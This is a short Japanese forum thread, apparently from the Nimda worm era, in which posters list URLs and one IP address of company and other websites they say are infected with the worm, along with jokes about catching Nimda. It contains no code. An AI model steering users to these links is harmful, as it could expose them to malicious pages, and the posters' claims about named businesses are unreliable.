http://www.hyundaijapan.co.jp/

OS入れ替えるたので（ME→２０００）Parlをインストールしたら
ニムダにやられてた・・・また入れ直しです（涙

やられちゃいました。

http://210.83.127.121

競馬で当ててニムダに感染しよう！

http://www.keibainet.com/profile/main_1.asp

ニムダには感染できるが、競馬はちがってた。失敬m(_ _)m

http://www.miruku.co.jp/kankou/kankou.html

いまもかよ・・。

やられちゃいました・・。

http://www.penki.co.jp/

ミサワホーム

http://www.misawa-hakodate.com/RealEstate4/data4/uindex.html

>>173
ウンチ？

よしなさいって！！